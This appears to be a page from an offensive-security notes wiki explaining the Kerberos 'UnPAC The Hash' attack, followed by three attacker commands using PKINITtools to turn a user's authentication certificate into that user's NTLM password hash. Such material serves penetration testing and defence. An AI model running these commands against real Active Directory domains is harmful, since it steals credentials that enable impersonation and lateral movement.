UnPAC The Hash

The UnPAC The Hash attack relies on two things that I first have to define: the PAC and PKINIT.

In the Kerberos Authentication protocol, a user's Kerberos tickets can contain a Privilege Attribute Certificate (PAC) that describes the user's security groups and privileges.
Public Key Cryptography for Initial Authentication in Kerberos (PKINIT) is an extension in Kerberos Authentication that allows for certificate-based authentication.

The PAC can also contain the NTLM hashes of the authenticating user, allowing users to switch the NTLM authentication when the target server doesn't support Kerberos.

When obtaining a Ticket Granting Ticket (TGT) using PKINIT, the Key Distribution Center (KDC) includes a session key and a PAC that includes the NTLM password hash of the authenticating user.

Using the TGT in a U2U and S4U2Self allows you to obtain a Kerberos Service Ticket (ST) with a PAC that can be unencrypted with the session key obtained earlier.

Once the PAC is decrypted, we can extract the NTLM hash.

Exploit

Scenario

We have access to a certificate that can be used for client authentication for a domain user ducky.

Your goal is to obtain the NTLM password hash for ducky by authenticating with the certificate using PKINIT to obtain a Kerberos ticket and recover the NTLM hash from the Kerberos ticket.

GitHub - dirkjanm/PKINITtools: Tools for Kerberos PKINIT and relaying to AD CSGitHub

Linux (Attacker)

## Authenticate using certificate and write output (ccache) to filename ducky
gettgtpkinit.py -cert-pfx ducky.pfx '[domain]/ducky' ducky

## Set the newly obtained ccache to the Kerberos credential cache environment variable
export KRB5CCNAME=/path/to/ducky.ccache

## Recover NT hash from the PAC
getnthash.py -key [encryption key from gettgtpkinit.py] '[domain]/ducky'

PreviousResource-Based Constrained Delegation NextRelay (DNS to HTTP)

Last updated 12 days ago

hashtagExploit

hashtagScenario

Exploit

Scenario